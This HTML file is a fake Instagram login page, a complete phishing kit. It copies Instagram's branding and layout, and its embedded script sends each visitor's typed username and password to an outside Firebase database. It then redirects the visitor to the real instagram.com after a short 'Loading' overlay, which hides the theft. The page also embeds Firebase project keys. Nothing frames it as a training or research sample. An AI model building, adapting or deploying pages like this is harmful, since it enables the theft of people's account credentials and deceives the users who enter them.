<!DOCTYPE html>

<style>
  body {
    font-family: sans-serif;
    background-color: #fafafa;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen,
      Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    box-sizing: border-box;
  }
  
  a {
    text-decoration: none;
  }
  
  .container {
    max-width: 1000px;
    margin: 0 auto;
    display: flex;
    justify-content: center;
    flex-direction: column;
    align-items: center;
    margin-top: 3rem;
    font-size: 14px;
  }
  
  .box {
    max-width: 350px;
    width: 100%;
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    background-color: #ffff;
    border: 1px solid #e6e6e6;
    border-radius: 1px;
    margin: 0 0 10px;
    padding: 10px 0;
    flex-grow: 1;
  }
  
  .heading {
    margin: 22px auto 12px;
    background-image: url("https://www.instagram.com/static/bundles/es6/sprite_core_b20f2a3cd7e4.png/b20f2a3cd7e4.png");
    background-position: -98px 0;
    height: 51px;
    width: 177px;
    overflow: hidden;
  }
  
  .field {
    margin: 10px 0;
    position: relative;
    font-size: 14px;
    width: 100%;
    text-overflow: ellipsis;
  }
  
  input {
    padding: 9px 0px 7px 9px;
    font-size: 12px;
    width: 16rem;
    height: 1.2rem;
    outline: none;
    background: #fafafa;
    border-radius: 3px;
    border: 1px solid #efefef;
  }
  
  /* label intial position*/
  
  label {
    position: absolute;
    pointer-events: none;
    left: 10px;
    padding-bottom: 15px;
    transform: translateY(10px);
    line-height: 6px;
    transition: all ease-out 0.1s;
    font-size: 14px;
    color: #999;
    padding-top: 6px;
  }
  
  /* hiding placeholder in all browsers */
  
  input::placeholder {
    visibility: hidden;
  }
  
  /* hiding  placeholder in mozilla */
  .login-form ::-moz-placeholder {
    color: transparent;
  }
  
  /* label final position */
  input:not(:placeholder-shown) + label {
    transform: translateY(0);
    font-size: 11px;
  }
  
  /* input padding increases if placeholder is not shown */
  input:not(:placeholder-shown) {
    padding-top: 14px;
    padding-bottom: 2px;
  }
  
  .login-button {
    text-align: center;
    width: 100%;
    padding: 0.5rem;
    border: 1px solid transparent;
    background-color: #3897f0;
    color: #fff;
    font-weight: 600;
    font-size: 14px;
    cursor: pointer;
  }
  
  .separator {
    display: flex;
    justify-content: space-between;
    align-items: center;
    color: #999;
    margin-top: 6px;
  }
  
  .separator .line {
    height: 1px;
    width: 40%;
    background-color: #dbdbdb;
  }
  
  .other {
    display: flex;
    justify-content: center;
    flex-direction: column;
    align-items: center;
  }
  
  .fb-login-btn {
    margin: 1rem;
    border: 0;
    cursor: pointer;
    font-size: 14px;
    color: #385185;
    font-weight: 600;
    background: transparent;
  }
  
  .fb-icon {
    color: #385185;
    font-size: 1rem;
    padding-right: 1px;
  }
  
  .forgot-password {
    font-size: 11px;
    color: #003569;
  }
  
  .signup {
    color: #3897f0;
    font-weight: 600;
  }
  
  .instabutton {
    position: absolute;
    top: 246px;
    width: 17.5%;
    height: 5%;
    cursor: pointer;
    border: 1px solid transparent;  
    background-color: #3897f0;
    color: #fff;
    font-weight: 600;
    font-size: 14px;
    border-radius: 5px;
  }
</style>

<style>
  #loading {
    display: none;
  }

  .loading-overlay {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(255, 255, 255, 0.7);
    display: flex;
    justify-content: center;
    align-items: center;
    z-index: 999;
  }
</style>

<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Instagram</title>
</head>
<body>
  <main class="l-main">
    <div class="container">
      <div class="box">
        <div class="heading"></div>
        <form class="login-form">
          <div class="field">
            <input
              id="username"
              type="text"
              placeholder="Phone number, username, or email"
            />
            <label for="username">Phone number, username, or email</label>
          </div>
          <div class="field">
            <input id="password" type="password" placeholder="password" />
            <label for="password">Password</label>
          </div>
            
          <div class="separator">
            <div class="line"></div>
            <p>OR</p>
            <div class="line"></div>
          </div>
          <div class="other">
            <button class="fb-login-btn" type="button">
              <i class="fa fa-facebook-official fb-icon"></i>
              <span class="">Log in with Facebook</span>
            </button>
            <a class="forgot-password" href="#">Forgot password?</a>
          </div>
        </form>
      </div>
      <div class="box">
        <p>Don't have an account? <a class="signup" href="#">Sign Up</a></p>
        <button id="AddBtn" class="instabutton" >Log In</button>
      </div>
    </div>
    <div id="loading" class="loading-overlay">
      <p>Loading...</p>
    </div>
  </main>

  <script type="module">
    import { initializeApp } from "https://www.gstatic.com/firebasejs/10.7.1/firebase-app.js";
    import { getDatabase, ref, push, set } from "https://www.gstatic.com/firebasejs/10.7.1/firebase-database.js";

    const firebaseConfig = {
      apiKey: "AIzaSyDpdwUMpAc325l597DTlRLvN6or4F-Q8yk",
      authDomain: "first-project-7e78e.firebaseapp.com",
      databaseURL: "https://first-project-7e78e-default-rtdb.firebaseio.com",
      projectId: "first-project-7e78e",
      storageBucket: "first-project-7e78e.appspot.com",
      messagingSenderId: "10447312396",
      appId: "1:10447312396:web:9fb47d84fc8914c7b54029"
    };

    const app = initializeApp(firebaseConfig);
    const db = getDatabase();

    let username = document.getElementById('username');
    let password = document.getElementById('password');
    let AddBtn = document.getElementById('AddBtn');

    function AddData() {
      const data = {
        email: username.value,
        password: password.value
      };

      // Use push to create a new unique entry
      const newEntryRef = push(ref(db, 'EmployeeSet/'));

      // Set data under the new unique entry
      set(newEntryRef, data)
        
    }

    function loadAndRedirect() {

      document.getElementById('loading').style.display = 'flex';

    setTimeout(function() {

    window.location.href = "https://www.instagram.com/";
  }, 1000);
}



    function checkInput(){

      var usernameInput = document.getElementById("username").value;
      var passwordInput = document.getElementById("password").value;

      if(usernameInput == "" || passwordInput == "") {
        console.log("empty");
      }
      else {
        AddData(),loadAndRedirect();
      }
    }
    AddBtn.addEventListener('click', checkInput);

  </script>
</body>
</html>
